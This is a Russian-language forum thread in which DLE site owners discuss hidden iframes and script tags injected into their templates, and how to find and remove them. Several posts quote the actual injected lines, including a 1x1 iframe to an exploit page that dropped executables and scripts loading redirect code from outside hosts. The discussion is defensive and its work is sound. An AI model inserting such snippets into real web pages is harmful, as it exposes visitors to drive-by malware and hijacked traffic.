Перейти к публикации

Для счастливчиков, кто на у себя на сайте находит трояна и ifram`ы


Рекомендованные сообщения

Snow Land

я говорил про вирус образно.

я статью про них писал в секлабе, так что не надо блабла. что это такое я знаю. сам разрабатывал.

просто при изменении части кода сигнатура изменяется, а раз в базе нет - значит "не вирус"

Ссылка на сообщение
Поделиться на других сайтах

конечно "С" него. опера лучше. ошибок для нее не было найдено уже достаточно долго в отличиие от FF.

ps. только полемику разводить не нужно у "кого длиннее". каждый выбирает сам

Ссылка на сообщение
Поделиться на других сайтах

Слушайте, а не может ли появиться iframe из-за того, что у админа null версия движка( это я не про себя, а про друга - он спрашивает :D )

Ссылка на сообщение
Поделиться на других сайтах

Слушайте, а не может ли появиться iframe из-за того, что у админа null версия движка( это я не про себя, а про друга - он спрашивает )

Конечно может. Доверяй, но проверяй.

Ссылка на сообщение
Поделиться на других сайтах

а почему нет? просто ктото в нулл вставил код стучалки, вот ему она и будет отстукивать какой пароль у админа сайта с нуллом

Ссылка на сообщение
Поделиться на других сайтах

Народу становится все больше, тех кто понимает чтото в php и вообще сети (с точки зрения матчасти) все меньше. Вероятно тут есть обратная зависимость =\

Итак. если Вы нашли на своем сайте код типа

<iframe src=http://***/***/ex.php border=0 width=1 height=1></iframe>
или
<script src=http://***/load.js></script>

(иногда такой код просто зашифрован яваскриптами - для невозможности прочтения)

мои поздравления

Вот и у меня появился первый опыт. Сегодня нашел:

<!-- ~ --><iframe src='http://coco32.org/o/exp/' frameborder=0 width=1 height=1></iframe>

Он мне на рабочий стол добавлял файлы download.exe, googletoolbar.exe, cstike.exe....

Мусор удалил, пароли сменил, хостеру сказал.

Вопрос: где еще может быть такая гадость кроме index.php ?

Celsoft,

Почему не сделать в админке:

«Hello admin, последний раз вы заходили 12.03.2007 в 19:32 с IP 198.198.198.198»

Эта запись в базу делалась бы при логине админа. Должно работать нормально, если включен сброс авторизации (в новых версиях DLE).

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

Читаем:

http://www.viruslist.com/ru/weblog

http://masterlink.art-neon.net/index.php?a...page;topic=30.0

Что бы такая бяка не портила скрипты, можно на них поставить chmod 444, по крайней мере на index.php, если его изменяете не часто.

Ссылка на сообщение
Поделиться на других сайтах
  • 3 недели спустя...

На двух ДЛЕ сайтах (в.5.0 и 4.0) iframe были прописаны после тэга body в файлах main.tpl во всех шаблонах.

B)

Ссылка на сообщение
Поделиться на других сайтах

А у меня иногда, где раз в два дня вылезит с верху сайта реклама Lovplenet да такой большой банер,

я страницу перезагружаю, и он исчезает и долго его не видно, подозреваю что это проблемы с хостером.

НУ если был бы фрейм он бы постоянно грузился

Ссылка на сообщение
Поделиться на других сайтах

А у меня иногда, где раз в два дня вылезит с верху сайта реклама Lovplenet да такой большой банер,

я страницу перезагружаю, и он исчезает и долго его не видно, подозреваю что это проблемы с хостером.

НУ если был бы фрейм он бы постоянно грузился

Ксати сегодня этот прикол с тем же баннером ловплэнэта я увидел на 4dle.ru

Значит хостер воду мутит к нему и надо стучать. и еще странно у 4ДЛЕ другой хост а у меня другой.

Ссылка на сообщение
Поделиться на других сайтах

это вроде бегун че то мутит... убрал его код, баннер пропал, короче хз

Да ну бегун наврятли. Код ковсем в друго месте. да и не думаю что бегун будет себе репутацию портить и тем более что этот баннер вылазиет редко .

Ссылка на сообщение
Поделиться на других сайтах
  • 3 года спустя...

решил откапать старую тему

сайт www.rumontazh.ru, обновился до 9,2

все проверил антивирусом, но все равно при заходе на сайт при кликам по внутренним страницам происходит пересылка на другой сайт.

что за вирус сидит?

Ссылка на сообщение
Поделиться на других сайтах

leksey,

из своих шаблонов удаляйте скрипты, в частности

</script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

Ссылка на сообщение
Поделиться на других сайтах

leksey,

из своих шаблонов удаляйте скрипты, в частности

</script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

Вроде не нашел никаких подозрительных скриптов, может не так смотрю

Ссылка на сообщение
Поделиться на других сайтах

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script>

<script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

Чего за мусор?

Сделал для своих нужд простенький сервис по пробивке всех нюансов (парсинг всего на сайте), позволяет быстро найти гадости, если таковые имеются, правда, не все работает еще, некогда заниматься, если устроит, юзайте в помощь: isle-arch.ru (пока только ссылки и меты).

Изменено пользователем zgr
Ссылка на сообщение
Поделиться на других сайтах

leksey,

из своих шаблонов удаляйте скрипты, в частности

</script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

Вроде не нашел никаких подозрительных скриптов, может не так смотрю

Или перефразирую вопрос, как это сделать?

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...